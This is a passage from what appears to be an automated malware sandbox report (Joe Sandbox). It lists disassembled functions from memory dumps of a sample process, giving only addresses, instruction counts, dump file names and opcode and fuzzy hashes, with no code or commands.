                                                                                                • Instruction Fuzzy Hash: 0FF05A2115E7C81FCB678B205DBA4817F31995350071E46DBC9C5CF0ABE169980ED76B
                                                                                                Function 006DF530 Relevance: .0, Instructions: 39COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 61fe28abe4cdbb302ff667ddba3749cd45daf5ac7a0c03c397ef9920d272a0b3
                                                                                                • Instruction ID: 17a67147a411902434acf3a7da52397f9aaccf40a55402752a0f62388e87bd96
                                                                                                • Opcode Fuzzy Hash: 61fe28abe4cdbb302ff667ddba3749cd45daf5ac7a0c03c397ef9920d272a0b3
                                                                                                • Instruction Fuzzy Hash: 5DF05E2462E7C50FD36387355CA95D63FF18F5710130946DBC8CACB1A3D9249A1A8756
                                                                                                Function 006DE678 Relevance: .0, Instructions: 39COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9c4d864b5f62cee4b4449e7f34e1eca1aa75a8f7bd9d9d9fe9991e6cc950baa0
                                                                                                • Instruction ID: 3c66ab9ccf9546235b4ff835732efc2011944a869924bb4299fc1c8e760511f2
                                                                                                • Opcode Fuzzy Hash: 9c4d864b5f62cee4b4449e7f34e1eca1aa75a8f7bd9d9d9fe9991e6cc950baa0
                                                                                                • Instruction Fuzzy Hash: 04F02236B141481FDB189A19D8889AEFBA6EFC8320B14407FEC05CB361EA318C028B81
                                                                                                Function 001C0992 Relevance: .0, Instructions: 38COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.445795160.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_1c0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f778ab3902957c0043795bd268916a23315865009abc8f1f8c168e9d63d41578
                                                                                                • Instruction ID: 6c83ab367be2d01d08e354c598a4331a84ce4d0945db2c94ae7b7611948e9c2d
                                                                                                • Opcode Fuzzy Hash: f778ab3902957c0043795bd268916a23315865009abc8f1f8c168e9d63d41578
                                                                                                • Instruction Fuzzy Hash: D4F044319052889FDB05DB60C865EAEBFB65B85300F05856AD442AB292DF749A0587C1
                                                                                                Function 00D59CB0 Relevance: .0, Instructions: 38COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: eae7e8f4ebbc3b12c01d8811a12b37a371f732fd59d4a748b75b8a94e49f696c
                                                                                                • Instruction ID: fbb35f7b52c70fe5f7d2db6ebaee49e54a8dcbde2b560c71455f02ac26a141db
                                                                                                • Opcode Fuzzy Hash: eae7e8f4ebbc3b12c01d8811a12b37a371f732fd59d4a748b75b8a94e49f696c
                                                                                                • Instruction Fuzzy Hash: B4F0BB62B0D3519FE71607745C30335FBA19BC7212F1940ABDD868F3E2DE6698068364
                                                                                                Function 00D59C58 Relevance: .0, Instructions: 37COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7fe4c17a3eea2a20e95ac02981e816bb0b14ebab32276f5c0e17dd577cb5e7e5
                                                                                                • Instruction ID: 5ea8e81fd7d7a455edbf11abc9714e69dc8677f4f44a9627137407ee09c3e862
                                                                                                • Opcode Fuzzy Hash: 7fe4c17a3eea2a20e95ac02981e816bb0b14ebab32276f5c0e17dd577cb5e7e5
                                                                                                • Instruction Fuzzy Hash: C3F0B472B046115FEB148759A820B2AF7A9EBC9720F144079ED069B390CF71AC418394
                                                                                                Function 00D5A818 Relevance: .0, Instructions: 35COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4090a9bb84ce45c0214630c25f11263063047e02ea6d187b43e4425e9851e094
                                                                                                • Instruction ID: c96b61312e5e7a4c09234d310aa89444bfcab0ec12ff55701a7cb3e72a1edae4
                                                                                                • Opcode Fuzzy Hash: 4090a9bb84ce45c0214630c25f11263063047e02ea6d187b43e4425e9851e094
                                                                                                • Instruction Fuzzy Hash: E5F090353056949FC7158F69D894C9A7FB4EF9A61531541AAE919CB322C670DC05CB20
                                                                                                Function 006D9048 Relevance: .0, Instructions: 34COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 60bd91b91475b910038fd0db3fffb268d7c14b1bfa8f72c6334a3b7585a5e5aa
                                                                                                • Instruction ID: 106c0516ce76920e8b91170b91ec6168801196cd901b3189b60ca892d9292ebb
                                                                                                • Opcode Fuzzy Hash: 60bd91b91475b910038fd0db3fffb268d7c14b1bfa8f72c6334a3b7585a5e5aa
                                                                                                • Instruction Fuzzy Hash: A7F04F34D09288AFCB51CFA4C860AEDBFF4EB0A310F14C59AD859D7251C2398A46DF10
                                                                                                Function 00D5BF10 Relevance: .0, Instructions: 34COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: aafc93c294f5fa98794342dc1d0073dd42db08c9bf61aca1ff530957424cb3e5
                                                                                                • Instruction ID: 50185e34043d6b9ac66a07206767fbfd11746ba48d6bdff5317ac3736bef2609
                                                                                                • Opcode Fuzzy Hash: aafc93c294f5fa98794342dc1d0073dd42db08c9bf61aca1ff530957424cb3e5
                                                                                                • Instruction Fuzzy Hash: 6FF0B43090D648AFCB07CB74A8987DD7FB2DF81211F0881EBD44AD71A2C7740A89CB49
                                                                                                Function 00D5DB88 Relevance: .0, Instructions: 33COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e3d8bdaef9b455ed8d47b6c58d34c164d2a5ba4fceece68b7665ad9217198765
                                                                                                • Instruction ID: 41661ca96efa3045cd1e31fd30736e8397f554c4eacfef67040ea4897412fae3
                                                                                                • Opcode Fuzzy Hash: e3d8bdaef9b455ed8d47b6c58d34c164d2a5ba4fceece68b7665ad9217198765
                                                                                                • Instruction Fuzzy Hash: A6F0C231D082589FCF15DB50CD655EEBBB2EF89301F10056EC842B7291C7751908CBB2
                                                                                                Function 006BD1B8 Relevance: .0, Instructions: 32COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 56768e0ec5e750d5fd9509b2a2d76247dc6c7fd4b96e17a1758b6facaf878d8b
                                                                                                • Instruction ID: 378e7c4927d56d0f7f655aa4999ff138ddc4bfe8d687882a218951ecc6c3c31b
                                                                                                • Opcode Fuzzy Hash: 56768e0ec5e750d5fd9509b2a2d76247dc6c7fd4b96e17a1758b6facaf878d8b
                                                                                                • Instruction Fuzzy Hash: 7BF0E73180020AEBCF01DF99D8109EEBB75FF89324F10C519EA5837210E732A5A6DBA0
                                                                                                Function 006BFF88 Relevance: .0, Instructions: 32COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 11d1a47e15113ac1f80ac59b5a9040436a86557ecdb7c4993be1a29b5c30e698
                                                                                                • Instruction ID: 766462ac72f1ce074098cc20535c70850edb4e2b1b5182a6758701a7e4753e8b
                                                                                                • Opcode Fuzzy Hash: 11d1a47e15113ac1f80ac59b5a9040436a86557ecdb7c4993be1a29b5c30e698
                                                                                                • Instruction Fuzzy Hash: B3F06D75909288AFCB02CFA4C9509ECBFB5EB56300F1481DEDC5457253C6368A87EF11
                                                                                                Function 006D59D1 Relevance: .0, Instructions: 32COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9c20b2f3c54b6393cc51ec7756b61fd9908c00c22ab181d15fafbbc368f44b68
                                                                                                • Instruction ID: 8a64437ad06007ae3de5a2cc763d940dbc1221bbcca974c409a0eb40e1c53761
                                                                                                • Opcode Fuzzy Hash: 9c20b2f3c54b6393cc51ec7756b61fd9908c00c22ab181d15fafbbc368f44b68
                                                                                                • Instruction Fuzzy Hash: 2A01FB70D05728CFCB14EF66C9856DCB7F6AF49301F146296D00EAB611D7305A42DF51
                                                                                                Function 006BE049 Relevance: .0, Instructions: 31COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5cf70d1fd7680e0724bccb3878537d7fcef535e076af5ee8cdcb86a8332ef0f0
                                                                                                • Instruction ID: 1b5c44fc2ffa3901a7c3128d99cff840d7f7d4b098e4f979cefb2bf1f66ede7e
                                                                                                • Opcode Fuzzy Hash: 5cf70d1fd7680e0724bccb3878537d7fcef535e076af5ee8cdcb86a8332ef0f0
                                                                                                • Instruction Fuzzy Hash: E7F03074809248AFCB02DFA4D8159ECBF75EF49304F14C19ADC5496252C6328A56DF01
                                                                                                Function 006BAF29 Relevance: .0, Instructions: 30COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0d85dd939f18b9a7b13b9c353efe51043757fd3d2f572778366d778ed25181a9
                                                                                                • Instruction ID: 0caabb1b9011fafec06fd711b2f4168254269520dd67a702783b26589abedc8a
                                                                                                • Opcode Fuzzy Hash: 0d85dd939f18b9a7b13b9c353efe51043757fd3d2f572778366d778ed25181a9
                                                                                                • Instruction Fuzzy Hash: 72F082B5509208AFCF01CF90DD11AED7F79EB45304F10C09AED4467352D7329A66EB51
                                                                                                Function 006B9958 Relevance: .0, Instructions: 29COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6d09e107559a7eaf0ae3127cd8ffa294650ec7ee223751c28714100063218f10
                                                                                                • Instruction ID: 9d9fe933ff3d49fb585bbc64dc7179a784b51984481c6eaa4f0899e5713a1209
                                                                                                • Opcode Fuzzy Hash: 6d09e107559a7eaf0ae3127cd8ffa294650ec7ee223751c28714100063218f10
                                                                                                • Instruction Fuzzy Hash: A6E092B5909304AFEB04DB90E952AECBB79EB46345F1491DDC8846B383C6335E47CBA1
                                                                                                Function 00D51292 Relevance: .0, Instructions: 29COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 418b9b3a93c7832afba0f2a7db6c9f8cdeaaea0bc654a86fe6fbbf19e9af4c9c
                                                                                                • Instruction ID: 12e9714e7a8e8cdbbff622fc4545338d0a058cc52cfbf4493dd8fd602781cf73
                                                                                                • Opcode Fuzzy Hash: 418b9b3a93c7832afba0f2a7db6c9f8cdeaaea0bc654a86fe6fbbf19e9af4c9c
                                                                                                • Instruction Fuzzy Hash: 1B010B789056688FDB64DF18E898BD9BBB1BB49301F1041EAE80DE2250D7719F84CF51
                                                                                                Function 006B8BD8 Relevance: .0, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 211fdafb5895f09932944b2948c0ff10889968593bf6d2dfa855e287b6e0a748
                                                                                                • Instruction ID: 7b0bef50ae773afb5e4fa6ef74aafbf3ffb83e8da8e95fd7a9a9cd3f27c17cc0
                                                                                                • Opcode Fuzzy Hash: 211fdafb5895f09932944b2948c0ff10889968593bf6d2dfa855e287b6e0a748
                                                                                                • Instruction Fuzzy Hash: 11F0A0B850A348AFCB02CBA4D911A98BF39EF42344F1080DAD88427352DB325D46DB61
                                                                                                Function 006B8DC8 Relevance: .0, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 352afdcb6b72e5e2c70bfc638746aae20f22534634857fee37f811a612c89a54
                                                                                                • Instruction ID: 71da62dc15c0bc01fb5611c1246cd71fb5ae3a738f8a3402408e7518133cda78
                                                                                                • Opcode Fuzzy Hash: 352afdcb6b72e5e2c70bfc638746aae20f22534634857fee37f811a612c89a54
                                                                                                • Instruction Fuzzy Hash: 34F03A74809248AFCB01CFA4D951A9CBFB5EF5A310F24C1DED84497352D7318A5ADF41
                                                                                                Function 006DD997 Relevance: .0, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7f1c496a34c5b22aac9b638b665aa61478f7779f59019dd7e97e2b0c0647f079
                                                                                                • Instruction ID: d16a70d5c062d792dfdc2db6225895e6f48af4626be56cb87057fc63b8140200
                                                                                                • Opcode Fuzzy Hash: 7f1c496a34c5b22aac9b638b665aa61478f7779f59019dd7e97e2b0c0647f079
                                                                                                • Instruction Fuzzy Hash: DCF01D34D4D3889FCB11DBA8D56459DBFB0EF4A200F1481EAD88497362C2399905DF12
                                                                                                Function 00D57120 Relevance: .0, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4aa4aaf0669d09bd1d579acb73c14a372be228ef527a0457d5c5b8b5ea089603
                                                                                                • Instruction ID: 88c71e987693fb58004ab9d1ae60335a7e0bccef3454b85aa5c74a538a632871
                                                                                                • Opcode Fuzzy Hash: 4aa4aaf0669d09bd1d579acb73c14a372be228ef527a0457d5c5b8b5ea089603
                                                                                                • Instruction Fuzzy Hash: 37F0E530A09344EFC701DFB8D951A98BFB5EF06205F2490EACC48CB352D6319D46CB61
                                                                                                Function 00D58C21 Relevance: .0, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 53c92901ebf71f891eaa9e04c18b99ab4426e58a44961c6876a089cb53054623
                                                                                                • Instruction ID: b2d9dbb524e6d28f25bc3edec36271238afe69e468de38a9d01530df607d6931
                                                                                                • Opcode Fuzzy Hash: 53c92901ebf71f891eaa9e04c18b99ab4426e58a44961c6876a089cb53054623
                                                                                                • Instruction Fuzzy Hash: C0F0FE309092449FCB45DFA4C95559CBBB0EB49300F14C1EACC59E7252D6359A45DF52
                                                                                                Function 006BEB18 Relevance: .0, Instructions: 27COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 470070876c47a3ff72dbb9b3c46ddd9a250a15263c08c22238a8757f455bd2bc
                                                                                                • Instruction ID: 5448ccb20bbadd7159dca1ee3e5c03ce56db54be68fb4c88c2287701eaed5f9f
                                                                                                • Opcode Fuzzy Hash: 470070876c47a3ff72dbb9b3c46ddd9a250a15263c08c22238a8757f455bd2bc
                                                                                                • Instruction Fuzzy Hash: 2CF01C74909384AFCB41DB788A916DCFFB0EF46308F2445EEC84997252E6324A5ACB01
                                                                                                Function 006B7472 Relevance: .0, Instructions: 27COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0af855796656b867f08e84baf1a8ac72e12680e55376552c48d190cdb309968b
                                                                                                • Instruction ID: dcad90225ef1f7efa637540c2f63bbaceab57e1808f23b90122e961bfb61b35b
                                                                                                • Opcode Fuzzy Hash: 0af855796656b867f08e84baf1a8ac72e12680e55376552c48d190cdb309968b
                                                                                                • Instruction Fuzzy Hash: 35F0F878D09288AFCB41DFA9D950ADCBFF0EB8A314F1481EAC85997352D6314A46DF11
                                                                                                Function 006D9058 Relevance: .0, Instructions: 27COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9054785dd08d5afc7f54d5edbd334beaad774cee113a726886ab887b1474189e
                                                                                                • Instruction ID: c07564991052252a5a91ecb5b886d052078352181c65f52903537812c374f284
                                                                                                • Opcode Fuzzy Hash: 9054785dd08d5afc7f54d5edbd334beaad774cee113a726886ab887b1474189e
                                                                                                • Instruction Fuzzy Hash: 80F08530D04208EFCB80CFA8D810AADBBF8EB49310F10C0AAA868D3340C6359A12DF60
                                                                                                Function 00D56218 Relevance: .0, Instructions: 27COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 806a81a535d6345571d21f0bab05e639d3285fefa4f0a89f7d4a6e6b079c9ab8
                                                                                                • Instruction ID: 1eef7232269a9bea160f6d1c6413434b497fb89d393cc2e19cd83c5c90e51753
                                                                                                • Opcode Fuzzy Hash: 806a81a535d6345571d21f0bab05e639d3285fefa4f0a89f7d4a6e6b079c9ab8
                                                                                                • Instruction Fuzzy Hash: 6EF0A034409348AFCB41CF60C914E99BF74EF0B311F1490E9ECC45B262C6309959EB61
                                                                                                Function 00D55CAF Relevance: .0, Instructions: 27COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 51ffaac19a9384a5e4419dd0ebf400e5bc86215464fc73e525600272518eaf7d
                                                                                                • Instruction ID: 7fbb73e6975806287f7bc194324c287811a3214b0713bf20031d001366224fed
                                                                                                • Opcode Fuzzy Hash: 51ffaac19a9384a5e4419dd0ebf400e5bc86215464fc73e525600272518eaf7d
                                                                                                • Instruction Fuzzy Hash: B1F05E308093489FCB05DFA4945069CBBB0FB05305F2081EA8C4497251D2349A49CF51
                                                                                                Function 006BA3B0 Relevance: .0, Instructions: 26COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a70f994228e24787fa97aac47fd2797a16303edf0b1bd7c89a70bca60b5f7f77
                                                                                                • Instruction ID: a532b3c19c452a28e1e45f33b9d192acdaf588906cee10a1a0e7b9e5357fd793
                                                                                                • Opcode Fuzzy Hash: a70f994228e24787fa97aac47fd2797a16303edf0b1bd7c89a70bca60b5f7f77
                                                                                                • Instruction Fuzzy Hash: C3F037B0919344DFCB41DBB8C95069C7FF19F06224F1482DAC494D73D2D7314A46DB11
                                                                                                Function 006B7C91 Relevance: .0, Instructions: 26COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e8b132671bb1183011ce4d1cbf90b684d68ecec7c25b91cb2ecf646418b18cfc
                                                                                                • Instruction ID: 3f76bca495b821e99ad7c7ea080277d73fc0bddb01821c0c509365596118500f
                                                                                                • Opcode Fuzzy Hash: e8b132671bb1183011ce4d1cbf90b684d68ecec7c25b91cb2ecf646418b18cfc
                                                                                                • Instruction Fuzzy Hash: 95E0126180A348AFD701EBB08825BDE7B74DF13304F1041EBD444A7263EA754A59DB92
                                                                                                Function 006DD198 Relevance: .0, Instructions: 26COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 06395e34cfec0917cceb1fc14021393759d4cdd711e776928d91fe3ab20b37e0
                                                                                                • Instruction ID: 52a241096be9fddee746991f676593d371e18c01f86c744514b714527ef56afa
                                                                                                • Opcode Fuzzy Hash: 06395e34cfec0917cceb1fc14021393759d4cdd711e776928d91fe3ab20b37e0
                                                                                                • Instruction Fuzzy Hash: 19F03034C0A348AFCB119F65D8555ADBF75EF46300F1481EBD88057352CA341A46DB95
                                                                                                Function 00D573D0 Relevance: .0, Instructions: 26COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7393525c693681d88bfffb2a97b45e4465abcdec4254689ed7741f22cd55fd87
                                                                                                • Instruction ID: a158fe12062b5d0b58ef30eaecc07cf471e0f32d587b7a0b246cda8264365c1e
                                                                                                • Opcode Fuzzy Hash: 7393525c693681d88bfffb2a97b45e4465abcdec4254689ed7741f22cd55fd87
                                                                                                • Instruction Fuzzy Hash: CCF06C3494E3849FCB41DB74D96069DBFF0DB06210F2441EECC55D7351D635494ADB11
                                                                                                Function 00D577B1 Relevance: .0, Instructions: 26COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
